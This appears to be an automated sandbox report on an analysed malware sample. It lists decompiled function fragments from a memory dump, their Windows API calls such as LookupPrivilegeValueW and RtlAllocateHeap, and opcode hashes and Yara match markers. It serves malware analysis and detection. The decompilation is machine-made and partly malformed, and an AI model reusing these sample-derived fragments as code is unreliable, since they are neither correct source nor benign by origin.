                                                                                                  • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 36%
                                                                                                  			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t12 = _a8;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}







                                                                                                  0x00418497
                                                                                                  0x0041849f
                                                                                                  0x004184a2
                                                                                                  0x004184a6
                                                                                                  0x004184ab
                                                                                                  0x004184ad
                                                                                                  0x004184b1

                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                  • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                  • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                  0x0041863a
                                                                                                  0x00418650
                                                                                                  0x00418654

                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                  • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                  • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                  0x00418503
                                                                                                  0x0041851a
                                                                                                  0x00418528

                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                  • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                  • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                                                                  • Instruction ID: fd774d3b0bc61d3a7aa453021c1500bd91abd8bee620a0c201bc48005ce4c1ae
                                                                                                  • Opcode Fuzzy Hash: 17181f3507c279752791e2aa22471a758bd41098e7ddf648eac0a54202aed8b0
                                                                                                  • Instruction Fuzzy Hash: 6DB09B729014C5C5E751D7E146087277E40BBD0741F16C065E2034645A4778C491F5B6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Non-executed Functions

                                                                                                  Function 00406A94, Relevance: .0, Instructions: 17COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 68b0a6595d4862fff30e1eb2258fa6c2b78889c8aace51edcbbde5f81fe9326b
                                                                                                  • Instruction ID: 58bb0399d5248d4a32fb9bcec233960bfa248e451d90819df1530af5bb586cd1
                                                                                                  • Opcode Fuzzy Hash: 68b0a6595d4862fff30e1eb2258fa6c2b78889c8aace51edcbbde5f81fe9326b
                                                                                                  • Instruction Fuzzy Hash: DDC08C36E0D01807DA2C8C1C74903F0FFAB8377235F203393E928BB505D083C896828A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF98A0, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                                                                  • Instruction ID: faece846fb01eb6975ba040edea2855791addd639896342270ecce2c82bcfbb4
                                                                                                  • Opcode Fuzzy Hash: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                                                                                                  • Instruction Fuzzy Hash: 9D90026230100402E212619944146060449D7D1385F91C066E142455DD86A58963F172
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9820, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                                                                  • Instruction ID: 7d1b735a22a5b19649e6f154ef82d6e7de2103ddc7700c1ff13656aa99959475
                                                                                                  • Opcode Fuzzy Hash: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                                                                                                  • Instruction Fuzzy Hash: 3D90027224100402E251719944046060449E7D0381F91C066A042455CE86D58A66FAA1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AFB040, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                                                                  • Instruction ID: f3c8290fe1112d82a342a523a8e0fc6da7db73fbf0a2c8117b1b59587387fdae
                                                                                                  • Opcode Fuzzy Hash: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                                                                                                  • Instruction Fuzzy Hash: B89002A2601140439650B19948044065455E7E1341391C175A0454568C86E88865E2A5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF95F0, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                                                  • Instruction ID: 04620aa6bb27d2803001550eeb25a7b6fbdadabc51dcd26a2ee6263f5864c7d4
                                                                                                  • Opcode Fuzzy Hash: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                                                  • Instruction Fuzzy Hash: 3990027220100802E214619948046860445D7D0341F51C065A602465DE96E588A1B171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF99D0, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                                                  • Instruction ID: aec79115d10e9f29738519f80e8b9a6866d442d6f00b0e29aa5afbb39a493aa5
                                                                                                  • Opcode Fuzzy Hash: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                                                  • Instruction Fuzzy Hash: E39002A221100042E214619944047060485D7E1341F51C066A215455CCC5A98C71A165
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9520, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                                                  • Instruction ID: b8ce471e7c7a138346ab2ae922cfa3cf3e060195f39402d61ad55433f7c77e70
                                                                                                  • Opcode Fuzzy Hash: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                                                  • Instruction Fuzzy Hash: E69002E2201140929610A2998404B0A4945D7E0341B51C06AE1054568CC5A58861E175
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AFAD30, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                                                  • Instruction ID: 8e6825e6d6d7f7841f06e553eb539a3830a05f6e9ebce233d1af554e9509b2c3
                                                                                                  • Opcode Fuzzy Hash: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                                                  • Instruction Fuzzy Hash: D2900272A0500012E250719948146464446E7E0781B55C065A051455CC89D48A65A3E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9560, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                                                  • Instruction ID: 646f29aa433657a7f6b878a5bb0b9a24a25762606e4e418690446bbce2054d3c
                                                                                                  • Opcode Fuzzy Hash: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                                                  • Instruction Fuzzy Hash: A7900266221000025255A599060450B0885E7D6391391C069F1416598CC6A18875A361
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9950, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                                                  • Instruction ID: 9f7130504737311f860d6fe042bcfaae4cab1c20afcb2dbc1997fe53db8d0800
                                                                                                  • Opcode Fuzzy Hash: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                                                  • Instruction Fuzzy Hash: DF9002A220140403E250659948046070445D7D0342F51C065A206455DE8AA98C61B175
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9A80, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                                                  • Instruction ID: 40e25c194c463a6d34ac6240e12ccfff647f7827ab26df814024db3cc07110ab
                                                                                                  • Opcode Fuzzy Hash: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                                                  • Instruction Fuzzy Hash: 9B90026220144442E25062994804B0F4545D7E1342F91C06DA415655CCC9958865A761
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF96D0, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                                                  • Instruction ID: a37e0ac19c17650d967899adc70e5001e93e6495321535b97a5631664e3e0301
                                                                                                  • Opcode Fuzzy Hash: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                                                  • Instruction Fuzzy Hash: A990027220100842E21061994404B460445D7E0341F51C06AA012465CD8695C861B561
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9A10, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                                                  • Instruction ID: cd24ce0a2d859d488f7286c22e6ed8d97b73ccb990e070c3ae511c639ad71a24
                                                                                                  • Opcode Fuzzy Hash: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                                                  • Instruction Fuzzy Hash: 5590027220140402E210619948087470445D7D0342F51C065A516455DE86E5C8A1B571
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9610, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                                                  • Instruction ID: c30fa2a5d7bca0bf62d3acebf9975c41ed408afd4442960619b60668b41d913b
                                                                                                  • Opcode Fuzzy Hash: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                                                  • Instruction Fuzzy Hash: 9B90027260500802E260719944147460445D7D0341F51C065A002465CD87D58A65B6E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9650, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                                                  • Instruction ID: 1279ba6ebe872f0cb41666492246e9200b7eb4ee599fedda41a5a78d08eff8db
                                                                                                  • Opcode Fuzzy Hash: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                                                  • Instruction Fuzzy Hash: 5790027220504842E25071994404A460455D7D0345F51C065A006469CD96A58D65F6A1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AFA3B0, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                                                  • Instruction ID: 3cdc3c48c5b0749e7d2c3f303ad117662c45c56e1d3a974a83615c23a46df001
                                                                                                  • Opcode Fuzzy Hash: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                                                  • Instruction Fuzzy Hash: 7990027220144002E2507199844460B5445E7E0341F51C465E042555CC86958866E261
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9730, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                                                                                  • Instruction ID: c731d0ac36add5569924dd98c56324c24c60b60f050a313278903dd9629f3b26
                                                                                                  • Opcode Fuzzy Hash: 0acf839a1bf6c2a0e027bda01caa432864400d61cab1016c64d6b9c51a25fc81
                                                                                                  • Instruction Fuzzy Hash: B290026260500402E250719954187060455D7D0341F51D065A002455CDC6D98A65B6E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9B00, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                                                                  • Instruction ID: b962c6b9c91677f59eabb441c46901add7741bb2ad88d548c5bcf5e74d541984
                                                                                                  • Opcode Fuzzy Hash: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                                                                  • Instruction Fuzzy Hash: 3A90026224100802E250719984147070446D7D0741F51C065A002455CD86968975B6F1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AFA710, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8a939d81e4fd1cabc4e69cc16b17da37559529d47fdebcb83e61d45206b42e60
                                                                                                  • Instruction ID: b0ef89177766c76499ee98f0d4d116d662485da101d51f72d532716484006b8a
                                                                                                  • Opcode Fuzzy Hash: 8a939d81e4fd1cabc4e69cc16b17da37559529d47fdebcb83e61d45206b42e60
                                                                                                  • Instruction Fuzzy Hash: 0890027230100052E610A6D95804A4A4545D7F0341B51D069A401455CC85D48871A161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9760, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4e18ec2f0c15f35cfbe453a931314575039e578d2f34dd9247ce4696241ba891
                                                                                                  • Instruction ID: 0ec2c6188df7e1179102a9bcf94399cfbd2e6314c960f92fc2271eb9f0db3a05
                                                                                                  • Opcode Fuzzy Hash: 4e18ec2f0c15f35cfbe453a931314575039e578d2f34dd9247ce4696241ba891
                                                                                                  • Instruction Fuzzy Hash: C690027220100403E210619955087070445D7D0341F51D465A042455CDD6D68861B161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9770, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2cf3d7d244ed32073fbe97c3ccb86759d0e12853f3911487fa058b850e0e5100
                                                                                                  • Instruction ID: 1ded18e532d4a1d35d656d21d58db86b3ada05586bd016116310bcd9b6db4fe5
                                                                                                  • Opcode Fuzzy Hash: 2cf3d7d244ed32073fbe97c3ccb86759d0e12853f3911487fa058b850e0e5100
                                                                                                  • Instruction Fuzzy Hash: 5290026220504442E21065995408A060445D7D0345F51D065A106459DDC6B58861F171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AFA770, Relevance: .0, Instructions: 4COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 468828c39cb25db6bc350bfaa0522f6c4405895d078d3004fc98ecfb250469d6
                                                                                                  • Instruction ID: 77f12ab8cb500c504d45ff28412b9c3d0df6ce4c0d199c1da5754de67c400e58
                                                                                                  • Opcode Fuzzy Hash: 468828c39cb25db6bc350bfaa0522f6c4405895d078d3004fc98ecfb250469d6
                                                                                                  • Instruction Fuzzy Hash: 4590027620504442E61065995804A870445D7D0345F51D465A042459CD86D48871F161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00AF9670, Relevance: .0, Instructions: 2COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction ID: fb8dc60d3c8ed19cd1cc89408650463b5fda6c01436fcdf4bfc276a0f888acbd
                                                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                  • Instruction Fuzzy Hash:
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00B4FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 53%
                                                                                                  			E00B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                  0x00b4fdda
                                                                                                  0x00b4fde2
                                                                                                  0x00b4fde5
                                                                                                  0x00b4fdec
                                                                                                  0x00b4fdfa
                                                                                                  0x00b4fdff
                                                                                                  0x00b4fe0a
                                                                                                  0x00b4fe0f
                                                                                                  0x00b4fe17
                                                                                                  0x00b4fe1e
                                                                                                  0x00b4fe19
                                                                                                  0x00b4fe19
                                                                                                  0x00b4fe19
                                                                                                  0x00b4fe20
                                                                                                  0x00b4fe21
                                                                                                  0x00b4fe22
                                                                                                  0x00b4fe25
                                                                                                  0x00b4fe40

                                                                                                  APIs
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4FDFA
                                                                                                  Strings
                                                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B4FE01
                                                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B4FE2B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
